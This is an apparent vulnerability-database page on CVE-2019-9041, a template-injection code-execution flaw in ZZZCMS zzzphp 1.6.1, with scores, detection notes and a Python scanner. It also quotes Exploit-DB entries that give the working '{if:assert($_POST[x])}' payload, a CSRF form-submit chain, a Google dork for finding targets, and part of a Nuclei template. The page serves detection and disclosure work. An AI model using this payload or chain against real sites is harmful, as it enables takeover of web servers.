CVE-2019-9041
Published 2019-02-23
Priority: P258 · high · 7.2 (CVSS 3.0)
Vector: AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 31.42% (98.1th percentile)
An issue was discovered in ZZZCMS zzzphp V1.6.1. In the inc/zzz_template.php file, the parserIfLabel() function's filtering is not strict, resulting in PHP code execution, as demonstrated by the if:assert substring.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| zzzcms | zzzphp | — | — |
Detection & IOCs (extracted from sources)
sigma
```yaml
matchers:
  - type: dsl
    dsl:
      - 'status_code_2 == 200'
      - '!contains(body_1, "phpinfo")'
      - 'contains_all(body_2, "phpinfo","PHP Version")'
    condition: and
```
- Detect the 'if:assert' substring in HTTP request bodies or template files, as this is the specific bypass pattern exploiting the weak filtering in parserIfLabel().
- Monitor for CSRF-based POST requests that write template content containing '{if:' blocks to the ZZZCMS admin panel template editor, which can chain into RCE without direct admin credentials.
- Flag responses to POST /search/ that contain both 'phpinfo' and 'PHP Version' in the body, as this indicates successful code execution via the template injection vulnerability.
- Inspect template files (e.g., search.html) in ZZZCMS installations for the presence of '{if:assert(...)}{end if}' or similar dynamic PHP evaluation constructs injected by an attacker.
- The RCE exploit (CVE-2019-9041) in its basic form requires authenticated access to the admin panel to edit templates; however, it can be chained with the CSRF vulnerability (CVE-2019-9082) to achieve unauthenticated exploitation.
- The vulnerability affects ZZZCMS zzzphp version 1.6.1 specifically; the nuclei template targets POST /search/ with Content-Type: application/x-www-form-urlencoded and requires two sequential requests to confirm exploitation.
- The vulnerability is confirmed to affect both Windows and Linux environments running IIS or Apache web servers.
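The template-file and request-body checks described in the list above, as an added example (not code from this page or from the ZZZCMS project). The function list beyond `assert`, the whitespace and case tolerance, and the form field names in the sample body are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Header of a template conditional, e.g. {if:assert($_POST[x])} from the advisory.
# Assumption: whitespace and case tolerance; the real parser may be stricter.
IF_HEADER = re.compile(r"\{\s*if\s*:(?P<cond>[^{}]*)\}", re.IGNORECASE)
# Assumption: PHP functions that evaluate or execute their argument. Only
# assert is named on the page; the rest are added for coverage.
CODE_EXEC_CALL = re.compile(
    r"\b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|"
    r"create_function|call_user_func(?:_array)?)\s*\(", re.IGNORECASE)
REQUEST_INPUT = re.compile(r"\$_(POST|GET|REQUEST|COOKIE|FILES|SERVER)\b")


def scan_template(text):
    """Return one finding per {if:...} header whose condition calls a
    code-executing function or reads request input."""
    findings = []
    for m in IF_HEADER.finditer(text):
        cond = m.group("cond")
        reasons = []
        call = CODE_EXEC_CALL.search(cond)
        if call:
            reasons.append("call:" + call.group(1).lower())
        if REQUEST_INPUT.search(cond):
            reasons.append("request-input")
        if reasons:
            line = text.count("\n", 0, m.start()) + 1
            findings.append({"line": line, "condition": cond.strip(),
                             "reasons": reasons})
    return findings


def scan_request_body(body, max_decodes=3):
    """URL-decode a form body (repeatedly, to undo double encoding) and scan it."""
    decoded = body
    for _ in range(max_decodes):
        nxt = unquote_plus(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return scan_template(decoded)


# Constructed samples: a benign template, the advisory's injected line, and a
# form body with hypothetical field names carrying the same line URL-encoded.
BENIGN = "<ul>\n{if:1==1}<li>home</li>{end if}\n</ul>\n"
INJECTED = "<h1>Search</h1>\n{if:assert($_POST[x])}phpinfo();{end if}\n"
FORM_BODY = ("file=search.html&content=%7Bif%3Aassert%28%24_POST%5Bx%5D%29%7D"
             "phpinfo%28%29%3B%7Bend+if%7D")
```

Run `scan_template` over each file in the installation's template directory and `scan_request_body` over logged POST bodies; any finding in a template that was not authored with such a condition warrants review of who last edited it.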
CVSS provenance
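| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 7.2 | HIGH | CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 6.5 | MEDIUM | AV:N/AC:L/Au:S/C:P/I:P/A:P |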
No detection rules found.
Exploit-DB
zzzphp CMS 1.6.1 - Cross-Site Request Forgery
exploitdb·2019-03-04·CVSS 7.2
CVE-2019-9082 [HIGH] zzzphp CMS 1.6.1 - Cross-Site Request Forgery
---
# Exploit Title: Cross-Site Request Forgery(CSRF) of zzzphp cms 1.6.1
# Google Dork: intext:"2015-2019 zzcms.com"
# Date: 26/02/2019
# Exploit Author: Yang Chenglong
# Vendor Homepage: http://www.zzzcms.com/index.html
# Software Link: http://115.29.55.18/zzzphp.zip
# Version: 1.6.1
# Tested on: windows/Linux,iis/apache
# CVE : CVE-2019-9082
Due to the absence of a CSRF token in the request, attackers can forge the POST request and insert malicious code into the template file, which leads to dynamic code evaluation.
Exploit:
history.pushState('', '', '/')
document.forms[0].submit();
Save the codes above as html file and host it on a web server. Send the link to the administrator of the website and
Exploit-DB
zzzphp CMS 1.6.1 - Remote Code Execution
exploitdb·2019-02-25·CVSS 7.2
CVE-2019-9041 [HIGH] zzzphp CMS 1.6.1 - Remote Code Execution
---
# Exploit Title: dynamic code evaluation of zzzphp cms 1.6.1
# Google Dork: intext:"2015-2019 zzcms.com"
# Date: 24/02/2019
# Exploit Author: Yang Chenglong
# Vendor Homepage: http://www.zzzcms.com/index.html
# Software Link: http://115.29.55.18/zzzphp.zip
# Version: 1.6.1
# Tested on: windows/Linux,iis/apache
# CVE : CVE-2019-9041
Due to the failure of the filtering function parserIfLabel() in inc/zzz_template.php, attackers can insert dynamic PHP code into the template file, which leads to dynamic code evaluation.
Exploit:
Log in to the admin panel, edit the template of search.html, and insert the following code:
{if:assert($_POST[x])}phpinfo();{end if}
Visit the http://webroot/search/ and post data “x = phpinfo();”, the page will execute
Nuclei
ZZZCMS 1.6.1 - Remote Code Execution
nuclei·CVSS 7.2
CVE-2019-9041 [HIGH] ZZZCMS 1.6.1 - Remote Code Execution
ZZZCMS zzzphp V1.6.1 is vulnerable to remote code execution via the inc/zzz_template.php file because the parserIfLabel() function's filtering is not strict, resulting in PHP code execution as demonstrated by the if:assert substring.
Template:
```yaml
id: CVE-2019-9041

info:
  name: ZZZCMS 1.6.1 - Remote Code Execution
  author: pikpikcu
  severity: high
  description: ZZZCMS zzzphp V1.6.1 is vulnerable to remote code execution via the inc/zzz_template.php file because the parserIfLabel() function's filtering is not strict, resulting in PHP code execution as demonstrated by the if:assert substring.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Apply the latest securit
```